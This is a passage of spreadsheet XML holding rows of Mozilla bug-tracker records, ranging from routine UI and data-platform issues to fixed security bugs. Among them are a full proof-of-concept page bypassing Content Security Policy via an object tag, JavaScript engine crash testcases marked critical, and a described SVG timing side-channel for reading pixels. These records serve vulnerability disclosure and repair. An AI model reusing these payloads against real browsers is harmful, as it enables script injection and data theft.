      <c r="N1616" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1616" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1616" t="inlineStr"/>
      <c r="Q1616" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1616" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1616" t="inlineStr">
        <is>
          <t>2013-04-04</t>
        </is>
      </c>
      <c r="T1616" t="n">
        <v>1</v>
      </c>
      <c r="U1616" t="n">
        <v>0</v>
      </c>
      <c r="V1616" t="n">
        <v>2</v>
      </c>
      <c r="W1616" t="inlineStr">
        <is>
          <t>In the theme review queue, when you click on Duplicate and enter either an ID or a link, an email is not sent. It does seem to reject the theme, however.</t>
        </is>
      </c>
      <c r="X1616" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" t="n">
        <v>1414044</v>
      </c>
      <c r="B1617" t="inlineStr">
        <is>
          <t>2017-11-02 12:56:50 -0700</t>
        </is>
      </c>
      <c r="C1617" t="inlineStr">
        <is>
          <t>Clients Daily should be backfilled</t>
        </is>
      </c>
      <c r="D1617" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E1617" t="n">
        <v>1</v>
      </c>
      <c r="F1617" t="n">
        <v>1</v>
      </c>
      <c r="G1617" t="n">
        <v>2</v>
      </c>
      <c r="H1617" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1617" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J1617" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1617" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1617" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1617" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1617" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1617" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1617" t="inlineStr">
        <is>
          <t>[DataPlatform]</t>
        </is>
      </c>
      <c r="Q1617" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1617" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1617" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1617" t="n">
        <v>1</v>
      </c>
      <c r="U1617" t="n">
        <v>0</v>
      </c>
      <c r="V1617" t="n">
        <v>8</v>
      </c>
      <c r="W1617" t="inlineStr">
        <is>
          <t>Users are confused when using the dataset, because it only goes back to some point in August. This can cause incorrect queries without people realizing it.
We should also document concretely when the dataset starts.</t>
        </is>
      </c>
      <c r="X1617" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" t="n">
        <v>19027</v>
      </c>
      <c r="B1618" t="inlineStr">
        <is>
          <t>1999-11-16 17:26:14 -0800</t>
        </is>
      </c>
      <c r="C1618" t="inlineStr">
        <is>
          <t>Figure out copyright of web site vs. specific content</t>
        </is>
      </c>
      <c r="D1618" t="inlineStr">
        <is>
          <t>2006-02-20 08:43:37 -0800</t>
        </is>
      </c>
      <c r="E1618" t="n">
        <v>1</v>
      </c>
      <c r="F1618" t="n">
        <v>1</v>
      </c>
      <c r="G1618" t="n">
        <v>5</v>
      </c>
      <c r="H1618" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1618" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J1618" t="inlineStr">
        <is>
          <t>Licensing</t>
        </is>
      </c>
      <c r="K1618" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1618" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1618" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1618" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1618" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1618" t="inlineStr"/>
      <c r="Q1618" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1618" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1618" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1618" t="n">
        <v>1</v>
      </c>
      <c r="U1618" t="n">
        <v>0</v>
      </c>
      <c r="V1618" t="n">
        <v>4</v>
      </c>
      <c r="W1618" t="inlineStr">
        <is>
          <t>esp. documentation</t>
        </is>
      </c>
      <c r="X1618" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" t="n">
        <v>688974</v>
      </c>
      <c r="B1619" t="inlineStr">
        <is>
          <t>2011-09-24 05:58:30 -0700</t>
        </is>
      </c>
      <c r="C1619" t="inlineStr">
        <is>
          <t>Assertion failure: lastProp-&gt;hasSlot() &amp;&amp; getSlot(lastProp-&gt;slot).isUndefined(), at jsscope.cpp:1151</t>
        </is>
      </c>
      <c r="D1619" t="inlineStr">
        <is>
          <t>2013-01-19 14:14:19 -0800</t>
        </is>
      </c>
      <c r="E1619" t="n">
        <v>1</v>
      </c>
      <c r="F1619" t="n">
        <v>1</v>
      </c>
      <c r="G1619" t="n">
        <v>3</v>
      </c>
      <c r="H1619" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1619" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1619" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1619" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1619" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1619" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1619" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1619" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1619" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q1619" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1619" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1619" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1619" t="n">
        <v>1</v>
      </c>
      <c r="U1619" t="n">
        <v>0</v>
      </c>
      <c r="V1619" t="n">
        <v>24</v>
      </c>
      <c r="W1619" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision fecae145d884 (options -m -n -a):
gczeal(2);
Object.defineProperty(Object.prototype, "b", {set: function() {}});
function C(a, b) {
    this.a=a;
    this.b=b;
}
var f = C.bind(0x2004, 2);
for (var i=0; i&lt;10000; ++i)
    new f;
S-s for now because test is GC-related (requires gczeal).</t>
        </is>
      </c>
      <c r="X1619" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" t="n">
        <v>1468160</v>
      </c>
      <c r="B1620" t="inlineStr">
        <is>
          <t>2018-06-11 02:42:34 -0700</t>
        </is>
      </c>
      <c r="C1620" t="inlineStr">
        <is>
          <t>Convert lodash .max() to native ES6 JS</t>
        </is>
      </c>
      <c r="D1620" t="inlineStr">
        <is>
          <t>2018-08-24 01:40:31 -0700</t>
        </is>
      </c>
      <c r="E1620" t="n">
        <v>1</v>
      </c>
      <c r="F1620" t="n">
        <v>1</v>
      </c>
      <c r="G1620" t="n">
        <v>7</v>
      </c>
      <c r="H1620" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1620" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1620" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K1620" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1620" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1620" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1620" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1620" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1620" t="inlineStr"/>
      <c r="Q1620" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1620" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1620" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1620" t="n">
        <v>1</v>
      </c>
      <c r="U1620" t="n">
        <v>0</v>
      </c>
      <c r="V1620" t="n">
        <v>17</v>
      </c>
      <c r="W1620" t="inlineStr">
        <is>
          <t>Converting all _.max() (lodash) functions to Math.max() (ES6 JS)</t>
        </is>
      </c>
      <c r="X1620" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" t="n">
        <v>790865</v>
      </c>
      <c r="B1621" t="inlineStr">
        <is>
          <t>2012-09-12 21:08:20 -0700</t>
        </is>
      </c>
      <c r="C1621" t="inlineStr">
        <is>
          <t>"Assertion failure: (thing)-&gt;compartment()-&gt;isCollecting()" with bfcache, canvas, gcslice</t>
        </is>
      </c>
      <c r="D1621" t="inlineStr">
        <is>
          <t>2014-01-10 10:40:22 -0800</t>
        </is>
      </c>
      <c r="E1621" t="n">
        <v>1</v>
      </c>
      <c r="F1621" t="n">
        <v>1</v>
      </c>
      <c r="G1621" t="n">
        <v>3</v>
      </c>
      <c r="H1621" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1621" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1621" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1621" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1621" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1621" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1621" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1621" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1621" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1621" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1621" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1621" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T1621" t="n">
        <v>1</v>
      </c>
      <c r="U1621" t="n">
        <v>0</v>
      </c>
      <c r="V1621" t="n">
        <v>12</v>
      </c>
      <c r="W1621" t="inlineStr">
        <is>
          <t>Created attachment 660697
testcase
1. Set
     user_pref("javascript.options.mem.gc_incremental", false);
2. Install https://www.squarefree.com/extensions/domFuzzLite3.xpi
3. Load the testcase.
Assertion failure: (thing)-&gt;compartment()-&gt;isCollecting(), at js/src/gc/Marking.cpp:586
May be related to an intermittent orange, bug 785582.</t>
        </is>
      </c>
      <c r="X1621" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" t="n">
        <v>1381360</v>
      </c>
      <c r="B1622" t="inlineStr">
        <is>
          <t>2017-07-16 17:59:28 -0700</t>
        </is>
      </c>
      <c r="C1622" t="inlineStr">
        <is>
          <t>Make the speech bubbles 3px to the right of the fox icons</t>
        </is>
      </c>
      <c r="D1622" t="inlineStr">
        <is>
          <t>2017-08-02 19:13:59 -0700</t>
        </is>
      </c>
      <c r="E1622" t="n">
        <v>1</v>
      </c>
      <c r="F1622" t="n">
        <v>1</v>
      </c>
      <c r="G1622" t="n">
        <v>2</v>
      </c>
      <c r="H1622" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1622" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1622" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1622" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L1622" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1622" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1622" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1622" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1622" t="inlineStr">
        <is>
          <t>[photon-onboarding]</t>
        </is>
      </c>
      <c r="Q1622" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1622" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1622" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T1622" t="n">
        <v>1</v>
      </c>
      <c r="U1622" t="n">
        <v>0</v>
      </c>
      <c r="V1622" t="n">
        <v>17</v>
      </c>
      <c r="W1622" t="inlineStr">
        <is>
          <t>Created attachment 8886901
triangle.png
The speech bubble in the onboarding notifications is missing a small triangle that points back at the fox.</t>
        </is>
      </c>
      <c r="X1622" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" t="n">
        <v>711043</v>
      </c>
      <c r="B1623" t="inlineStr">
        <is>
          <t>2011-12-15 06:35:45 -0800</t>
        </is>
      </c>
      <c r="C1623" t="inlineStr">
        <is>
          <t>SVG Filter Timing Attack</t>
        </is>
      </c>
      <c r="D1623" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:13 -0700</t>
        </is>
      </c>
      <c r="E1623" t="n">
        <v>1</v>
      </c>
      <c r="F1623" t="n">
        <v>1</v>
      </c>
      <c r="G1623" t="n">
        <v>3</v>
      </c>
      <c r="H1623" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1623" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1623" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1623" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1623" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1623" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1623" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1623" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1623" t="inlineStr">
        <is>
          <t>[sg:high][adv-main22+][adv-esr1707+][pixel-stealing]</t>
        </is>
      </c>
      <c r="Q1623" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1623" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1623" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T1623" t="n">
        <v>1</v>
      </c>
      <c r="U1623" t="n">
        <v>0</v>
      </c>
      <c r="V1623" t="n">
        <v>117</v>
      </c>
      <c r="W1623" t="inlineStr">
        <is>
          <t>The SVG filter code has various optimisations which mean that different inputs images will take varying amounts of time for the same filter. It's possible to time this difference to read pixel values.
The feMorphology filter in particular has an optimisation that means that it will process an image of uniform colour (e.g. all black) much quicker than one containing varying pixel values. 
The PoC I've attached is very simple and just tries to tell if some links are :visited. Of course it could be extended to read pixel values from iframes to try and read text cross-domain. 
On my PC (WinXP, Intel Core 2 Duo E8400) with the default settings of the PoC, the difference between a positive and negative result is about 70ms. If it doesn't work for you, try altering the filterRes or radius variables in steps of 10.</t>
        </is>
      </c>
      <c r="X1623" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" t="n">
        <v>639303</v>
      </c>
      <c r="B1624" t="inlineStr">
        <is>
          <t>2011-03-06 06:13:21 -0800</t>
        </is>
      </c>
      <c r="C1624" t="inlineStr">
        <is>
          <t>FF4 crashes on multipart image/motion jpeg stream changing image size [@ @0x0 | mozilla::imagelib::Decoder::Finish() ]</t>
        </is>
      </c>
      <c r="D1624" t="inlineStr">
        <is>
          <t>2013-06-26 14:45:22 -0700</t>
        </is>
      </c>
      <c r="E1624" t="n">
        <v>1</v>
      </c>
      <c r="F1624" t="n">
        <v>1</v>
      </c>
      <c r="G1624" t="n">
        <v>3</v>
      </c>
      <c r="H1624" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1624" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1624" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K1624" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1624" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1624" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1624" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1624" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1624" t="inlineStr">
        <is>
          <t>[sg:critical][bug 638018 is fixing this on the 1.9.2 branch]</t>
        </is>
      </c>
      <c r="Q1624" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1624" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1624" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T1624" t="n">
        <v>1</v>
      </c>
      <c r="U1624" t="n">
        <v>0</v>
      </c>
      <c r="V1624" t="n">
        <v>60</v>
      </c>
      <c r="W1624" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Build Identifier: Nightly Build 5.March 2011 downloaded from http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-4.0b13pre.en-US.mac.dmg
Web page containing UI elements (select box). 
Changing the select box element will remotely (on the server) start a CGI script and set the relevant parameter.
Something crashes FF4.
Reproducible: Always
Steps to Reproduce:
1. Open URL http://appcam.mobotixcam.de:2080 and authorize.
 Authorization Credentials (type without the quotes!)
   user   : "user"
  password: "Firefox"
2. From select box (the one in the middle) choose "Image Size"
3. From select box (the one on the right) choose "Mega" or "VGA", whatever is not selected
Actual Results:  
FF4 crashes.
Expected Results:  
Image size is set to the selected size.</t>
        </is>
      </c>
      <c r="X1624" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" t="n">
        <v>554670</v>
      </c>
      <c r="B1625" t="inlineStr">
        <is>
          <t>2010-03-24 09:54:17 -0700</t>
        </is>
      </c>
      <c r="C1625" t="inlineStr">
        <is>
          <t>TM: "Assertion failed: LIR type error (start of writer pipeline): arg 1 of 'fmul' is 'int' which has type int32 (expected float64): 0 (../nanojit/LIR.cpp" or "Assertion failure: m != TT_INT32 || isInt32(*vp), at ../jstracer.cpp"</t>
        </is>
      </c>
      <c r="D1625" t="inlineStr">
        <is>
          <t>2013-01-14 07:50:33 -0800</t>
        </is>
      </c>
      <c r="E1625" t="n">
        <v>1</v>
      </c>
      <c r="F1625" t="n">
        <v>1</v>
      </c>
      <c r="G1625" t="n">
        <v>3</v>
      </c>
      <c r="H1625" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1625" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1625" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1625" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1625" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1625" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1625" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1625" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1625" t="inlineStr">
        <is>
          <t>[sg:critical?]fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q1625" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1625" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1625" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1625" t="n">
        <v>1</v>
      </c>
      <c r="U1625" t="n">
        <v>0</v>
      </c>
      <c r="V1625" t="n">
        <v>17</v>
      </c>
      <c r="W1625" t="inlineStr">
        <is>
          <t>x = true;
(function() {
  for each(let c in [0, x]) {
    (arguments)[4] *= c
  }
})()
asserts js debug shell on JM tip with -m and -j at Assertion failed: LIR type error (start of writer pipeline): arg 1 of 'fmul' is 'int' which has type int32 (expected float64): 0 (../nanojit/LIR.cpp:2610)</t>
        </is>
      </c>
      <c r="X1625" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" t="n">
        <v>1441468</v>
      </c>
      <c r="B1626" t="inlineStr">
        <is>
          <t>2018-02-27 01:57:56 -0800</t>
        </is>
      </c>
      <c r="C1626" t="inlineStr">
        <is>
          <t>csp bypass using object tag</t>
        </is>
      </c>
      <c r="D1626" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:03 -0800</t>
        </is>
      </c>
      <c r="E1626" t="n">
        <v>1</v>
      </c>
      <c r="F1626" t="n">
        <v>1</v>
      </c>
      <c r="G1626" t="n">
        <v>3</v>
      </c>
      <c r="H1626" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1626" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1626" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K1626" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1626" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1626" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1626" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1626" t="inlineStr">
        <is>
          <t>[fixed by bug 1555043][adv-main70+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1626" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1626" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1626" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T1626" t="n">
        <v>1</v>
      </c>
      <c r="U1626" t="n">
        <v>0</v>
      </c>
      <c r="V1626" t="n">
        <v>17</v>
      </c>
      <c r="W1626" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Steps to reproduce:
visit this POC.html:
===
&lt;html&gt;
&lt;meta http-equiv="Content-Security-Policy" content="default-src 'self';script-src 'none';object-src data:;img-src 'none';frame-src data:"/&gt;
&lt;!-- CSP is set and both script-src and img-src is 'none' --&gt;
&lt;body&gt;
&lt;!-- inline script will run and remote image load --&gt;
&lt;object data='data:text/html;,&lt;svg version="1.1" width="660" height="342" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;script&gt;console.log("Remote Image test")&lt;/script&gt;&lt;image xlink:href="https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superman/img/logo/bd_logo1_31bdc765.png?x" width="660" height="342"/&gt;&lt;/svg&gt;'&gt;&lt;/object&gt;
&lt;!-- CSP works fine --&gt;
&lt;iframe src='data:text/html;,&lt;script&gt;console.log("Remote Image test")&lt;/script&gt;&lt;img src="https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superman/img/logo/bd_logo1_31bdc765.png?x" width="660" height="342"/&gt;'&gt;&lt;/iframe&gt;
&lt;/body&gt;
&lt;/html&gt;
===
Actual results:
in object tag , inline script runs and remote image loads , but in iframe tag ,CSP works fine
Expected results:
Ref: https://www.w3.org/TR/CSP3/#directive-img-src
"This directive controls requests which load images. More formally, this includes requests whose type is "image" [FETCH]."
Ref: https://www.w3.org/TR/CSP3/#directive-script-src
"The script-src directive restricts the locations from which scripts may be executed. This includes not only URLs loaded directly into script elements, but also things like inline script blocks and XSLT stylesheets [XSLT] which can trigger script execution."
object tag should behaves like iframe</t>
        </is>
      </c>
      <c r="X1626" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" t="n">
        <v>50104</v>
      </c>
      <c r="B1627" t="inlineStr">
        <is>
          <t>2000-08-23 18:49:38 -0700</t>
        </is>
      </c>
      <c r="C1627" t="inlineStr">
        <is>
          <t>PLEvent queue needs priority handling</t>
        </is>
      </c>
      <c r="D1627" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E1627" t="n">
        <v>1</v>
      </c>
      <c r="F1627" t="n">
        <v>1</v>
      </c>
      <c r="G1627" t="n">
        <v>3</v>
      </c>
      <c r="H1627" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1627" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1627" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K1627" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1627" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1627" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1627" t="inlineStr"/>
      <c r="Q1627" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1627" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1627" t="inlineStr">
        <is>
          <t>Future</t>
        </is>
      </c>
      <c r="T1627" t="n">
        <v>1</v>
      </c>
      <c r="U1627" t="n">
        <v>1</v>
      </c>
      <c r="V1627" t="n">
        <v>45</v>
      </c>
      <c r="W1627" t="inlineStr">
        <is>
          <t>Build with LDAP support (see http://www.mozilla.org/directory/xpcom.html for
instructions).
Now, via a reasonably fast link (eg the Netscape LAN), visit an LDAP search URL
that returns a lot of directory entries, such as 
ldap://memberdir.netscape.com:389/ou=member_directory,o=netcenter.com??sub?(sn=Smith)
The UI will completely stall out on all platforms for quite some time (on my
Linux box, it hangs for 45 seconds).
If I do this from a slow link (like my ricochet modem, which is ~28.8K), the UI
behaves reasonably (ie the throbber and status bar continue to spin, XUL menus
continue to work, etc).  Alternately, if I sleep a while between callbacks (a la
line 423 of nsLDAPConnection.cpp), the problem goes away.
Doug, I took your advice and moved 99% of the callback logic to the LDAP
connection thread (note that nsLDAPChannel.cpp is now compiled with #define
INVOKE_LDAP_CALLBACKS_ON_MAIN_THREAD 0).  This doesn't seem to make any
perceptible difference.
Is it time for event priorities so that events related to the chrome and UI can
take precedence?</t>
        </is>
      </c>
      <c r="X1627" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" t="n">
        <v>933219</v>
      </c>
      <c r="B1628" t="inlineStr">
        <is>
          <t>2013-10-31 06:06:42 -0700</t>
        </is>
      </c>
      <c r="C1628" t="inlineStr">
        <is>
          <t>Compartment mismatch when sending multiple messages in test_outgoing.js</t>
        </is>
      </c>
      <c r="D1628" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:22 -0800</t>
        </is>
      </c>
      <c r="E1628" t="n">
        <v>1</v>
      </c>
      <c r="F1628" t="n">
        <v>1</v>
      </c>
      <c r="G1628" t="n">
        <v>6</v>
      </c>
      <c r="H1628" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1628" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1628" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K1628" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1628" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1628" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1628" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1628" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1628" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q1628" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1628" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1628" t="inlineStr">
        <is>
          <t>1.3 Sprint 6 - 12/6</t>
        </is>
      </c>
      <c r="T1628" t="n">
        <v>1</v>
      </c>
